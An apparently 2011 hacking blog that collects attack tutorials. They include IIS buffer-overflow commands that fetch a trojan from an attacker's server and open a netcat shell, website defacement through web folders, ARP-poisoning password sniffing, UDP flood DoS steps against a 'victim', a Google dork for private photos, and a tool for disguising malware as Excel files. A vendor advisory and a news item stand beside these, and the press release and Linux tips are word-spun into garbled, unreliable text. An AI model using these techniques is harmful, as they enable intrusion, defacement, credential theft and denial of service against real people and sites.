Thursday, March 31, 2011

Learn How To Hack Web Servers




Hacking Tool: IISHack.exe

iishack.exe overflows a buffer used by IIS http daemon, allowing for arbitrary code to be executed.
c:\ iishack www.yourtarget.com 80 www.yourserver.com/thetrojan.exe
www.yourtarget.com is the IIS server you're hacking, 80 is the port its listening on, www.yourserver.com is some webserver with your trojan or custom script (your own, or another), and /thetrojan.exe is the path to that script.
"IIS Hack" is a buffer overflow vulnerability exposed by the way IIS handles requests with .HTR extensions. A hacker sends a long URL that ends with ".HTR". IIS interprets it as a file type of HTR and invokes the ISM.DLL to handle the request. Since ISM.DLL is vulnerable to a buffer overflow, a carefully crafted string can be executed in the security context of IIS, which is privileged. For example, it is relatively simple to include in the exploit code a sequence of commands that will open a TCP/IP connection, download an executable and then execute it. This way, any malicious code can be executed.
A sample exploit can be constructed as shown below:
To hack the target site and attacker's system running a web server can use iishack.exe and ncx.exe.
To begin with, the ncx.exe is configured to run from the root directory. IIShack.exe is then run against the victim site.
c:\>iishack.exe  80 /ncx.exe 
The attacker can then use netcat to evoke the command shell
c:\>nc  80 
He can proceed to upload and execute any code of his choice and maintain a backdoor on the target site.


IPP Buffer Overflow Countermeasures

  • Install latest service pack from Microsoft.
  • Remove IPP printing from IIS Server
  • Install firewall and remove unused extensions
  • Implement aggressive network egress filtering
  • Use IISLockdown and URLScan utilities
  • Regularly scan your network for vulnerable servers
Without any further explanation, the first countermeasure is obviously to install the latest service packs and hotfixes.
As with many IIS vulnerabilities, the IPP exploit takes advantage of a bug in an ISAPI DLL that ships with IIS 5 and is configured by default to handle requests for certain file types. This particular ISAPI filter resides in C: \WINNT\System32\msw3prt.dll and provides Windows 2000 with support for the IPP. If this functionality is not required on the Web server, the application mapping for this DLL to .printer files can be removed (and optionally deleting the DLL itself) in order to prevent the buffer overflow from being exploited. This is possible because the DLL will not be loaded into the IIS process when it starts up. In fact, most security issues are centered on the ISAPI DLL mappings, making this one of the most important countermeasure to be adopted when securing IIS.
Another standard countermeasure that can be adopted here is to use a firewall and remove any extensions that are not required. Implementing aggressive network egress can help to a certain degree.
With IIS, using IISLockdown and URLScan - (free utilities from Microsoft) can ensure more protection and minimize damage in case the web server is affected.
Microsoft has also released a patch for the buffer overflow, but removing the ISAPI DLL is a more proactive solution in case there are additional vulnerabilities that are yet to be found with the code.


ISAPI DLL Source disclosures

  • Microsoft IIS 4.0 and 5.0 can be made to disclose fragments of source code which should otherwise be in accessible.
  • This is done by appending "+.htr" to a request for a known .asp (or .asa, .ini, etc) file.
  • appending this string causes the request to be handled by ISM.DLL, which then strips the '+.htr' string and may disclose part or all of the source of the .asp file specified in the request.
IIS supports several file types that require server-side processing. When a web site visitor requests a file of one of these types, an appropriate filter DLL processes it. Vulnerability exists in ISM.DLL, the filter DLL that processes .HTR files. HTR files enable remote administration of user passwords.
HTR files are scripts that allow Windows NT password services to be provided via IIS web servers. Windows NT users can use .HTR scripts to change their own passwords, and administrators can use them to perform a wide array of password administration functions. HTR is a first-generation advanced scripting technology that is included in IIS 3.0, and still supported by later versions of IIS for backwards compatibility. However, HTR was never widely adopted, and was superceded by Active Server Pages (ASP) technology introduced in IIS 4.0.

Attack Methods
Exploit / Attack Methodology
By making a specially formed request to IIS, with the name of the file and then appending around 230 + " %20 " (these represents spaces) and then appending " .htr " this tricks IIS into thinking that the client is requesting a " .htr " file . The .htr file extension is mapped to the ISM.DLL ISAPI Application and IIS redirects all requests for .htr resources to this DLL.
ISM.DLL is then passed the name of the file to open and execute but before doing this ISM.DLL truncates the buffer sent to it chopping off the .htr and a few spaces and ends up opening the file whose source is sought. The contents are then returned. This attack can only be launched once though, unless the web service started and stopped. It will only work when ISM.DLL first loaded into memory.
"Undelimited .HTR Request" vulnerability: The first vulnerability is a denial of service vulnerability. All .HTR files accept certain parameters that are expected to be delimited in a particular way. This vulnerability exists because the search routine for the delimiter isn't properly bounded. Thus, if a malicious user provided a request without the expected delimiter, the ISAPI filter that processes it would search forever for the delimiter and never find it.
If a malicious user submitted a password change request that lacked an expected delimiter, ISM.DLL, the ISAPI extension that processes .HTR files, would search endlessly for it. This would prevent the server from servicing any more password change requests. In addition, the search would consume CPU time, so the overall response of the server might be slowed.
The second threat would be more difficult to exploit. A carefully-constructed file request could cause arbitrary code to execute on the server via a classic buffer overrun technique. Neither scenario could occur accidentally. This vulnerability does not involve the functionality of the password administration features of .HTR files.
".HTR File Fragment Reading" vulnerability: The ".HTR File Fragment Reading" vulnerability could allow fragments of certain types of files to be read by providing a malformed request that would cause the. HTR processing to be applied to them. This vulnerability could allow a malicious user to read certain types of files under some very restrictive circumstances by levying a bogus .HTR request. The ISAPI filter will attempt to interpret the requested file as an .HTR file, and this would have the effect of removing virtually everything but text from a selected file. That is, it would have the effect of stripping out the very information that is most likely to contain sensitive information in .asp and other server-side files.
The .htr vulnerability will allow data to be added, deleted or changed on the server, or allow any administrative control on the server to be usurped. Although .HTR files are used to allow web-based password administration, this vulnerability does not involve any weakness in password handling.
"Absent Directory Browser Argument" vulnerability: Among the default HTR scripts provided in IIS 3.0 (and preserved on upgrade to IIS 4.0 and IIS 5.0) were several that allowed web site administrators to view directories on the server. One of these scripts, if called without an expected argument, will enter an infinite loop that can consume all of the system's CPU availability, thereby preventing the server from responding to requests for service.

Tuesday, March 29, 2011

Core Security Integrates CORE IMPACT Pro with Metasploit Project

Core Security Technologies, bourgeois of CORE Effect Pro, the most sweeping production for proactive endeavour security investigating, today declared that it has created a fully nourished discipline compounding between its flagship software set and the Metasploit open-source tap possibility.

With today's organizations using incursion testing to strategically trial their vulnerabilities and IT defenses, Ngo Instrument now offers both nonrecreational onslaught testers and operational protection staffers who use Modify Pro the cognition to tap direct into the open-source functionality of Metasploit to influence out vulnerability psychotherapy.

By providing the chance to use Metasploit in concert with Effect Pro, perception testers instrument now be healthy to apprize all the benefits of Core's commercial-grade, automated solution - with its monolithic repository of professionally industrial exploits, economical and easy-to-use program and in-depth reporting capabilities - alongside the advisable noted staring thing send.

Through the desegregation, testers faculty now be fit to:

1. Get a system compromised during investigating with Metasploit into the Touch environs and deploy an Touch Pro Functionary. The Official is a patented, syscall agent load that allows users to:

    * Displace Upshot Pro's ladened extent of automatic perception testing capabilities from the compromised scheme.
    * Leverage IMPACT's wide selection of commercial-grade exploits, plus denary pre- and post-exploitation capabilities for in-depth, omnibus attempt copy.
    * Marcher perception tests to different systems, mimicking an attacker's attempts at identifying and exploiting paths of imperfectness to backend systems and aggregation.

2. Use Combat Pro's automated Fast Incursion Run (RPT) to utilise vulnerabilities, then begin Metasploit's db-autopwn feature and afterwards upload the results affirm into Modify Pro. This allows users with fewer breeding and skillfulness to panorama Metasploit investigation accumulation within the IMPACT surround.

"We've long respected the acquisition of H.D. Thespian, his team and the district of Metasploit contributors in creating a sumptuous tap hypothesis that offers practised testers a reach of capabilities, and we loved to egest it easier for those who require to use Metasploit alongside Set Outcome Pro to do so," said Fred Pinkett, vice chairwoman of fluid direction at Nucleus Warrantee. "By message paid testers and warrantee body greater power to centralize their assessments and united their Metasploit efforts into their Event Pro deployments, we think that we're providing the market with an enlarged opportunity to communicate out Change Pro-Metasploit combining gift officially come in the close version of CORE Alter Pro, due to board from Nucleus Certificate in Apr 2010.

"As someone who utilizes both CORE Fight Pro and Metasploit, it's invaluable to see Nucleus flying towards integrating in this way," said Steve Shead, Administrator of IT & Info Warrantee Functionary and at CafePress.com. "It faculty make testers many orbit for umbrella investigation and categorization, and another boulevard of affliction checking by mercantilism Metasploit experimentation results position into Event Pro. It's pleasing to see Ngo targeting their development efforts into providing automatic onset investigation capabilities that are as stretched and propulsive as humanly workable; ultimately this agency t
mechanism."

"The compounding the Metasploit structure with Change Pro module define a new era for vulnerability agreement," said Chris Nickerson, CEO of Lares Consulting. "Adult onrush testers and enterprises similar present now help from the exploits of Metasploit while existence competent to investing the right profession and reporting of Touch Pro. The most reliable mercenary means merging with the extravasation furnish research of the subject inspiration community will surely be a hit for all."

{Linux} Tips and Tricks

Are you a unix geek ? Here are both indispensible linux tips and tricks which are staleness for new and knowledgeable users alike.Lets change a aspect at them-More Linux Tips and tricks for geeks and newbies alike

Hurrying up your alcoholic journeying

Get faster file dealings by using 32-bit transfers on your cruel force

Conscionable add the line:

    hdparm -c3 /dev/hdX

to a bootup script.If you use SuSE or remaining distros based on SYS V,

    /sbin/init.d/boot.localised

should manipulate for you. This enables 32-bit dealings on your marmorean ride. On whatever systems it can alter soul action by 75%. To trial your show vantage, write:

    hdparm -t -T /dev/hdX

Author DOS-like commands
More grouping are unwinding to Linux because they avoid the stability of gracious old DOS. In that wanton, more users are typewriting DOS commands (which originated from UNIX in the premiere abode) that lie smooth but make errors. The order "cd.." in DOS is dead binding, but Linux balks. This is because "cd" is a mastery, and any constant for that dictation staleness be unconnected from the code book application in your domicile directory to modify the file ".bashrc". The point is there on utility, this hides the line from inborn ls representation.

Add the lines:

    name cd/="cd /"
    a.k.a. cd~="cd ~"
    alias cd..="cd .."

And I usually add these...

    name md="mkdir"
    name rd="rmdir -i"
    a.k.a. rm="rm -i"

and my position and comfort lover a.k.a....

    a.k.a. ls="ls --color"

name is a compelling puppet, and can be victimised in the .bashrc book as surface as from the compel connection. You can, if you need to pass the reading, create your own group of bomb commands to agree how you run. As longitudinal as you put them in your .bashrc record, they'll be there everytime you log in. Notation that if you oft log in as structure, you power require to simulate /home/username/.bashrc to /root/.bashrc to remain yourself lucid.

Scene your timezone
The timezone under Linux is set by a symbolic statement from /etc/localtime[1] to a enter in the /usr/share/zoneinfo[2] directory that corresponds with what timezone you are in. For model, since I'm in Southeast Australia, /etc/localtime is a symlink to /usr/share/zoneinfo/Australia/South. To set this join, type:

    ln -sf ../usr/share/zoneinfo/your/zone /etc/localtime

Pose your/zone with something suchlike Australia/NSW or Australia/Perth. Screw a lie in the directories under /usr/share/zoneinfo to see what timezones are purchasable.

   1. This assumes that /usr/share/zoneinfo is linked to /etc/localtime as it is low Red Hat Unix.
   2. On senior systems, you'll effort that /usr/lib/zoneinfo is utilised instead of /usr/share/zoneinfo. See also the ulterior writing ``The period in both applications is wicked''.

How to do approving with tar ?
You can mantain a position of files that you with to voice into a enter and tar it when you greet.

    tar czvf tarfile.tar.gz -T list_file

where list_file is a acerate name of what you poverty to allow into the tar

i.e:

    /etc/smb.conf
    /root/myfile
    /etc/ppp (all files into the /etc/ppp directory)
    /opt/gnome/html/gnome-dev-info.html

How to protect a computer from responsive to sound ?

a panduriform "sound 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all" instrument do the fob... to grow it back on, only

    "ring 0 > /proc/sys/net/ipv4/icmp_echo_ignore_all"

Check adjusted for statesman tips and tricks.

Cheers

Friday, March 25, 2011

Use SSH Tunneling to surf net invisibly

Unable to surf net over work/college ? Want to surf net invisibly ? Well,we have a solution for that,SSH Tunneling.An SSH tunnel is an encrypted tunnel created through an SSH protocol connection. SSH tunnels may be used to tunnel unencrypted traffic over a network through an encrypted channel.In easy language,you can surf net without being monitored and even surf blocked sites too.SSH Is pretty awesome.
Without leaving your seat,you have a way to control a computer which ay be located anywhere on this planet.SSH TunnelingAnd if you have access to a PC with an SSHd installed, you can channelize your traffic through that computer,which is particularly is useful in situations when -
  1. The site is normally inaccessible from your current location (School/Work)
  2. You do not want your connection monitored (You’re using a WiFi hotspot/You’re in a country that monitors/censors your internet usage)
In this tutorial,I will be using Firefox on Gentoo Linux , but it its applicable to all distributions of linux.
Step One: Setting Up the Tunnel
All common Linux distributions come with openssh packages. To check whether you have ssh installed already type the command "which ssh". Gentoo has opensh package preinstalled,so no tension :)
First we need to SSH to the server that we want to tunnel through, open up terminal and type the following command
ssh -ND @
Replace with a port number of your choice; This will be the LOCAL port which Firefox will use to tunnel the traffic later on…Try to choose a high and random port number so as nobody scans or sneaks them in (system admin and firewalls)
Practical Example:
ssh -ND 2945 [email protected]
Now enter your password as usual, and it will hang after authentication, which is perfectly normal as it isn’t an interactive session- Now minimize the terminal and open Firefox.
Step Two: Configuring Firefox
In Firefox, Go to (Depending upon which version you are using)
preferences -> advanced -> Network -> connection settings
or
Tools –> options –> Advanced –> Network –> settings
A new window should appear,select the “Manual Proxy Configuration” option, you’ll need to type some information in the ‘SOCKS Host’ section.
Host: localhost
Port: Port you used in the SSH command earlier.
Save your changes..Just to make sure it worked, check your IP with an online IP checker :)

Happy Surfing

Darkjumper v5.8 Sqli,Lfi,Rfi,Rce scanner

Darkjumper v5.8 Sqli,Lfi,Rfi,Rce scanner

Darkjumper is a free tool what will try to find every website that hosts at the same server as your target. Then check for every vulnerability of each website that host at the same server.

Here are some key features of "Darkjumper":

· scan sql injection, rfi, lfi, blind sql injection
· autosql injector
· proxy support
· verbocity
· autoftp bruteforcer
· IP or Proxy checker and GeoIP

Requirements:

· Python


Download link: http://mac.softpedia.com/get/Security/Darkjumper.shtml

Wednesday, March 23, 2011

Google trick to find private pictures!

Maybe you are a "voyeur".

Maybe you need some pictures for your school work.

Of course you can go to a dedicated website where you can find lot of free pictures.

But you can also dig some private pictures directories.

Try this little code in Google, you may find lot of Non public pictures
Quote:
intitle:index.of +"Indexed by Apache::Gallery"
search by adding a word at the end, for example:

Quote:
intitle:index.of +"Indexed by Apache::Gallery" +paris
I just realise that maybe some of you guys use Apache Gallery for your own private pictures.

If you want to verify if your own private pictures ares indexed, just paste this code in Google.

Quote:
site:www.YourSite intitle:index.of +"Indexed by Apache::Gallery"
(Replace YourSite by the server hosting your pictures (your URL.)

IIS EXPLOIT [For Xp And Win7]

Steps for Xp-
# open run
# type-
%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}
and press enter !
#A new window name "WEB FOLDER" gets open
#Right click and click on New, Add Web Folder then enter your vulnerable website address.
#then next….finish
# now You can insert your page with name index.html by simply copy pasting.
Also after getting access to the website…Many websites don’t allows you to
add your page. so leave them.
#Dork- "Powered by IIS" or use your own unique dork.
Windows 7-
#Click Start.
#Click Computer.
# In the following dialog click Map Network Drive.
# On the Map Network Drive dialog, click "Connect to a Web site that you can use to store your documents and Pictures" this will pop up the "Welcome to the Add Network Location Wizard".
# Click on Next.
# Click on ”Choose a custom network location”.
# Click on Next.
# Now type the web folder address that you want to access.
# Enter a NAME to help you identify the web folder and click Next.
# Place a checkmark on ‘Open this network location when I click finish’.
# Click Finish.
and insert your deface page !!

How To Sniff Passwords With Cain And Abel

Download Cain and Abel Here: Cain & Abel
Run Cain and Abel as administrator
Go to the tab that says sniffer
Go to the upper right corner under the Cain pciture and enable the sniffer
select your adapter (usually the one that has a listed Ip address)
Click of the blue Plus sign
Leave everything as is and press ok
Right click on each of ip addresses that come up
Resolve the host name for each one of them
Go to the bottom of the screen and hit the APR tab
Click on the top box
Click the blue plus sign
Hind the computer you want get passwords/information from in the left hand box
Highlight everything that comes up in the righthand box
Go to the upper right hand corner, by the sniffer and enable the APR poisener
To Find passwords, go to the bottem of the screen where it says passwords
Here you will find all usernames and passwords of the person you have poisened (Most of the passwords will be in HTTP)

If you didn't understand this look below:


[Image: cain1ql6.jpg]

[Image: cain2ix7.jpg]

[Image: cain3ki1.jpg]

[Image: cain4ff7.jpg]

[Image: cain5im8.jpg]

[Image: cain6zb1.jpg]

[Image: cain7hj2.jpg]

How to use Net-Tools! Best Tool Ever!

The definition of Net Tools
Net Tools is cutting-edge security and network monitoring software for the Internet and Local Area Networks, providing clients with the ability and confidence to meet the challenges of tomorrow's technology. Keeping pace with the industry trends, we offer professional tools that support the latest standards, protocols, software, and hardware for both wired and wireless networks. The main goal is the creation of high quality software. Net Tools is a very strong combination of network scanning, security, file, system, and administrator tools useful in diagnosing networks and monitoring your PC and computer's network connections for system administrators. Next to the essential core tools it includes a lot of extra valuable features. It’s a Swiss Army knife for everyone interested in a set of powerful network tools for everyday use. This all-in-one toolkit includes also a lot of handy file and system utilities next to the huge amount of network tools. The menus are fully configurable, so in this way you won’t get lost in the extremely large amount of essential tools. All the additional features will make this application a must have for all system administrators. There are numerous constructive and valuable applications included in Net Tools that can be used for a great amount of purposes. The latest version of Net Tools is hybrid; it means that it’s capable of working together with applications that are made and designed for Net Tools, so in this way more flexibility and user-friendliness is obtained. This software is designed for the Microsoft Windows OS (Windows 98, NT, 2000, 2003, XP, Vista). It’s entirely compatible and has thoroughly been tested on Windows XP. With the 175+ tools it is a great collection of useful tools for network users. The size of Net Tools 5.0.70 is approximately 25 Mb.

Some screenshots!
http://mabsoft.com/ntscreenshot1.JPG
http://mabsoft.com/ntscreenshot2.JPG
http://mabsoft.com/ntscreenshot3.JPG
http://mabsoft.com/ntscreenshot4.JPG
http://mabsoft.com/ntscreenshot5.JPG
http://mabsoft.com/ntscreenshot6.JPG
http://mabsoft.com/ntscreenshot7.JPG
http://mabsoft.com/ntscreenshot8.JPG
http://mabsoft.com/ntscreenshot9.JPG

Some features of Net Tools

Code:
Net Tools 5.0 (build 70) contains a whole variety of network tools.

1) IP Address Scanner
2) IP Calculator
3) IP Converter
4) Port Listener
5) Port Scanner
6) Ping
7) NetStat (2 ways)
8) Trace Route (2 ways)
9) TCP/IP Configuration
10) Online - Offline Checker
11) Resolve Host & IP
12) Time Sync
13) Whois & MX Lookup
14) Connect0r
15) Connection Analysator and protector
16) Net Sender
17) E-mail seeker
18) Net Pager
19) Active and Passive port scanner
20) Spoofer
21) Hack Trapper
22) HTTP flooder (DoS)
23) Mass Website Visiter
24) Advanced Port Scanner
25) Trojan Hunter (Multi IP)
26) Port Connecter Tool
27) Advanced Spoofer
28) Advanced Anonymous E-mailer
29) Simple Anonymous E-mailer
30) Anonymous E-mailer with Attachment Support
31) Mass E-mailer
32) E-mail Bomber
33) E-mail Spoofer
34) Simple Port Scanner (fast)
35) Advanced Netstat Monitoring
36) X Pinger
37) Web Page Scanner
38) Fast Port Scanner
39) Deep Port Scanner
40) Fastest Host Scanner (UDP)
41) Get Header
42) Open Port Scanner
43) Multi Port Scanner
44) HTTP scanner (Open port 80 subnet scanner)
45) Multi Ping for Cisco Routers
46) TCP Packet Sniffer
47) UDP flooder
48) Resolve and Ping
49) Multi IP ping
50) File Dependency Sniffer
51) EXE-joiner (bind 2 files)
52) Encrypter
53) Advanced Encryption
54) File Difference Engine
55) File Comparasion
56) Mass File Renamer
57) Add Bytes to EXE
58) Variable Encryption
59) Simple File Encryption
60) ASCII to Binary (and Binary to ASCII)
61) Enigma
62) Password Unmasker
63) Credit Card Number Validate and Generate
64) Create Local HTTP Server
65) eXtreme UDP Flooder
66) Web Server Scanner
67) Force Reboot
68) Webpage Info Seeker
69) Bouncer
70) Advanced Packet Sniffer
71) IRC server creater
72) Connection Tester
73) Fake Mail Sender
74) Bandwidth Monitor
75) Remote Desktop Protocol Scanner
76) MX Query
77) Messenger Packet Sniffer
78) API Spy
79) DHCP Restart
80) File Merger
81) E-mail Extractor (crawler / harvester bot)
82) Open FTP Scanner
83) Advanced System Locker
84) Advanced System Information
85) CPU Monitor
86) Windows Startup Manager
87) Process Checker
88) IP String Collecter
89) Mass Auto-Emailer (Database mailer; Spammer)
90) Central Server (Base Server; Echo Server; Time Server; Telnet Server; HTTP Server; FTP Server)
91) Fishing Port Scanner (with named ports)
92) Mouse Record / Play Automation (Macro Tool)
93) Internet / LAN Messenger Chat (Server + Client)
94) Timer Shutdown/Restart/Log Off/Hibernate/Suspend/ Control
95) Hash MD5 Checker
96) Port Connect - Listen tool
97) Internet MAC Address Scanner (Multiple IP)
98) Connection Manager / Monitor
99) Direct Peer Connecter (Send/Receive files + chat)
100) Force Application Termination (against Viruses and Spyware)
101) Easy and Fast Screenshot Maker (also Web Hex Color Picker)
102) COM Detect and Test
103) Create Virtual Drives
104) URL Encoder
105) WEP/WPA Key Generator
106) Sniffer.NET
107) File Shredder
108) Local Access Enumerater
109) Steganographer (Art of hiding secret data in pictures)
110) Subnet Calculater
111) Domain to IP (DNS)
112) Get SNMP Variables
113) Internet Explorer Password Revealer
114) Advanced Multi Port Scanner
115) Port Identification List (+port scanner)
116) Get Quick Net Info
117) Get Remote MAC Address
118) Share Add
119) Net Wanderer
120) WhoIs Console
121) Cookies Analyser
122) Hide Secret Data In Files
123) Packet Generator
124) Secure File Splitting
125) My File Protection (Password Protect Files, File Injections)
126) Dynamic Switch Port Mapper
127) Internet Logger (Log URL)
128) Get Whois Servers
129) File Split&Merge
130) Hide Drive
131) Extract E-mails from Documents
132) Net Tools Mini (Client/Server, Scan, ICMP, Net Statistics, Interactive, Raw Packets, DNS, Whois, ARP, Computer's IP, Wake On LAN)
133) Hook Spy
134) Software Uninstaller
135) Tweak & Clean XP
136) Steganographic Random Byte Encryption
137) NetTools Notepad (encrypt your sensitive data)
138) File Encrypter/Decrypter
139) Quick Proxy Server
140) Connection Redirector (HTTP, IRC, ... All protocols supported)
141) Local E-mail Extractor
142) Recursive E-mail Extractor
143) Outlook Express E-mail Extractor
144) Telnet Client
145) Fast Ip Catcher
146) Monitor Host IP
147) FreeMAC (MAC Address Editor)
148) QuickFTP Server (+user accounts support)
149) NetTools Macro Recorder/Player (Keybord and Mouse Hook)
150) Network Protocol Analyzer
151) Steganographic Tools (Picture, Sounds, ZIP Compression and Misc Methods)
152) WebMirror (Website Ripper)
153) GeoLocate IP
154) Google PageRank Calculator
155) Google Link Crawler (Web Result Grabber)
156) Network Adapter Binder
157) Remote LAN PC Lister
158) Fast Sinusoidal Encryption
159) Software Scanner
160) Fast FTP Client
161) Network Traffic Analysis
162) Network Traffic Visualiser
163) Internet Protocol Scanner
164) Net Meter (Bandwidth Traffic Meter)
165) Net Configuration Switcher
166) Advanced System Hardware Info
167) Live System Information
168) Network Profiler
169) Network Browser
170) Quick Website Maker and Web Gallery Creator
171) Remote PC Shutdown
172) Serial Port Terminal
173) Standard Encryptor
174) Tray Minimizer
175) Extra Tools (nmap console & win32 version)

Many extra features and utilities are included in this package!

Now, Lets show you how to use some of my favorite tools!

The IP Sniffer!
Well, First of all you want to open Net-Tools.
Now click on Start<Exterior Tools<Internet Tools<Advanced Packet Sniffer.
Now a window should pop up, From there do you see the three tabs under "start logging?" Click on UDP.
Now, Open the chat window you are using to talk with someone, I believe it can be used with almost anything, [just make sure you dont have any background programs running] Once you have the chat open, Click on "Start Logging" And type to him, As soon as you do that, Click "Stop Logging". Now the IP that isn't yours should be the victims. If there is multiple IPs, Just look for the one that appears the most.

The UDP Flooder!
Go to Start<Network Tools and scroll down some till you see "UDP Flooder"
This tool can actually be used to DoS someone! A Actual computer!
The only down fall is that you must have a Dedicated Box, Which cost... eh somewhere around 80$ a month.
If you do have a Box, Just put Net Tools on the box.
Once you have Net Tools on your box, Enter the victims IP, Enter some random data such as [jklsahdakljsdh] and copy and paste it like TWO times. Put the speed to 10 and click start!
NOTICE** This cannot be used on your PC, Not strong enough! Must be used with a Dedicated Box.

Tutorial IRC Trojan!
Start<System Tools<Tut IRC Trojan.
**NOT TESTED**

Add bytes to a .exe!

Start<File Tools<Add Byes to .EXE
And MANY MANY more! There a hundreds of tools!

Download Here!



-Mr.Mindfreak

Monday, March 21, 2011

Hf & Fs & Fsc & Mu & Df Cookies Cheker program


this program is programed by me using c# language

it's function is to check (hotfile & fileserve & megaupload &filesonic &depositfiles )cookies either it is premium or not
his program is programed by me using c# language

it's function is to check (hotfile & fileserve & megaupload &filesonic &depositfiles )cookies either it is premium or not


[Image: 92043980.png]

[Image: 87555372.png]

note :
fileserve (short) :it is the "PHPSESSID"
fileserve (long) :it is the "cookie"

to check a cookies 
Code:
1)take cookies copy
2)press "add" or "past from clipboard" to add cookies
3)choose "hotfile" or "fileserve" or"megaupload" or.........
4)press start
5)"start button" will change to "stop" , wait until it change to "start" again and the working cookies will be placed in the textbox (large one)

note :
- you can use "past-start" to skip step 2 & 4
-this program isn't adware or spyware
-file size is 15 Kb only (Very simple program )

Download:
Code:
http://www.fileserve.com/file/UhZzZxw


Scan Report :
Code:
http://vscan.novirusthanks.org/analysis/cb91ff53af0c9042a60e9181801dc31c/Y29va2llcy1jaGVja2VydjItMi1leGU=/

Saturday, March 19, 2011

EXE to Xls Exploit [ms office exploit


EXE to Xls Exploit [ms office exploit] Tutorial by: -Mr.MindfReak™EXE to Xls Exploit [ms office exploit] Tutorial by:-Mr.MindfReak™

[Image: 19370769.png]This Exploit will Convert your malware {bot} ,i.e any exe file to .Xls {office document}


Before you attempt to use this Exploit Make Sure you have "Perl" Installed

Usage:-Watch Video in Full Screen for HQ..




The converted output file will not be fud i.e .Xls Document but you can hex it to make it Fud{No so Easy Though}

Password is:- darkhk3r
Download Link:-http://sharecash.org/download.php?file=1574741
OR
Download Link:-http://fileme.us/2H7XU

Friday, March 18, 2011

How To Port Forward (Router & Modem Style)

What Is Portforwarding?

Port forwarding is necessary for using different tools, Such as RATs and uTorrent and so on. Please follow this guide on How To Port Forward and you'll have your port forwarded :)!


Today i'll teach you how to port forward through the router & modem. (Not with PFConfig :) )

Lets Start!

Start off by going to: Start -> Run -> CMD -> And Type IPCONFIG
[Image: FASDASD.png]

Now Copy That "Standard Gateway // Default Gateway" IP And Type It Into Your Webbrowser & Log in.
[Image: IP_2.png]

My username is Root - nothing. The router // modem accounts usually are theese:

Admin -
Admin - Admin
Admin - Password
Admin - User
Admin - Root
Admin - Custom Password, Check underneath your router for it! ;)

Root - Admin
Root -
Root - Password
Root - Root
Root - Password
Root - Custom Password. Check underneath ;)

User - Root
User -
User - Admin
User - Password
User - User
User - Custom Pass.

And so on.

Once you're logged in, Go to the "port forwarding" or in this case, "Virtual Server"

[Image: Ip_3.png]

[Image: DASDSAD.png]

Virtual Server: Enable / Disable.
Local IP: Found In IPConfig, As IP Adress.
Start Port: The Port You Want To Forward, Start Port.
End Port: The Port You Want To Forward, End Port.
Protocol: TCP & UDP or BOTH
Remark: The Name Of The Wished Forwarded Program.

And When You've Saved The Settings, Go To Canyouseeme.org And Type Your Port In There, And If It Says

[Image: Ip_5.png]

Then You've Succeded Your Port Forwarding.

If It Says

[Image: Ip_6.png]

You've Failed. Then I Advice You To Take A Look At Portforward.com And Look For Your Router Or Modem, Once You Find It They Have A Port Forward Tutorial There.

Tuesday, March 15, 2011

Adobe warns of zero-day flaw in Flash

 Adobe has warned of a critical zero-day flaw that is found in most versions of its Flash player and which may also affect Reader and Acrobat.
The flaw is being exploited in the wild, the company said, and a patch will be issued as soon as possible, but is unlikely to come before next week.

"A critical vulnerability exists in Adobe Flash Player 10.2.152.33 and earlier versions (Adobe Flash Player 10.2.154.13 and earlier for Chrome users) for Windows, Macintosh, Linux and Solaris operating systems, Adobe Flash Player 101.106.16 and earlier versions for Android, and the authplay.dll component that ships with Adobe Reader and Acrobat X (10.0.1) and earlier 10.x and 9.x versions for Windows and Macintosh operating systems," warned Adobe.
"There are reports that this vulnerability is being exploited in the wild in targeted attacks via a Flash (.swf) file embedded in a Microsoft Excel (.xls) file delivered as an email attachment. At this time, Adobe is not aware of attacks targeting Adobe Reader and Acrobat."
Reader X for Windows will not be included in the new patch, because the sandboxing technology it currently uses will mitigate the attack. Testing the patch to include the latest version of Reader would set the release back another week, Adobe said.
So far the attacks seen have been few and far between, Adobe said, with only a few organisations affected. It was working with Microsoft Active Protections Partners (MAPP) to deal with the issue.

ESA-2011-006: EMC Avamar privilege escalation vulnerability

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

ESA-2011-006: EMC Avamar privilege escalation vulnerability.


EMC Identifier: ESA-2011-006


CVE Identifier: CVE-2011-0648


Severity Rating: CVSS v2 Base Score: 8.5 (AV:N/AC:M/Au:S/C:C/I:C/A:C)
 
Affected products:
EMC Avamar version v5.0.4-26 and earlier


Vulnerability Summary:
A vulnerability exists in EMC Avamar which may be exploited to get escalated privileges in the 
affected system.
 
Vulnerability Details:
EMC Avamar contains a potential privilege escalation vulnerability that may allow an authenticated 
user to obtain escalated eadministrative privileges in the affected system.


Problem Resolution:
The following EMC Avamar products contain resolution to this issue:

EMC Avamar versions v4.1.0-1470, v4.1.1-340, v4.1.2-33, v5.0.0-407, -409, -410, v5.0.1-32, v5.0.2-41, 
and v5.0.3-29 with hotfix 24753 applied EMC Avamar 5.0.4-30 or later


EMC strongly recommends all customers apply the hotfix or upgrade to Avamar Version 5.0.4-30 or later, 
which contain the resolution to this issue, at the earliest opportunity.


Link to remedies:
For the location of the hotfix and installation instructions please see KB article esg119699. To upgrade the
 Avamar server to v5.0 SP4 please contact Avamar Customer Support to schedule an upgrade.




For explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC recommends that
 all customers take into account both the base score and any relevant temporal and environmental scores, which
 may impact the potential severity associated with particular security vulnerability.




EMC Corporation distributes EMC Security Advisories in order to bring to the attention of users of the affected
 EMC products important security information. EMC recommends all users determine the applicability of this
 information to their individual situations and take appropriate action. The information set forth herein is 
provided "as is" without warranty of any kind. EMC disclaims all warranties, either express or implied, including 
the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event shall EMC 
or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of 
business profits or special damages, even if EMC or its suppliers have been advised of the possibility of such 
damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages
 so the foregoing limitation may not apply.

EMC Product Security Response Center
Security_Alert () EMC com
http://www.emc.com/contact-us/contact/product-security-response-center.htm

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (Cygwin)

iEYEARECAAYFAk1/ebYACgkQtjd2rKp+ALw9jQCg4FTZiJPlCOJLpRIYYCJZMh3U
Ud4AoJgW78yo+nOpyRlnlye07riOALXg
=tKjd
-----END PGP SIGNATURE-----

Splunk v.4.2 Released

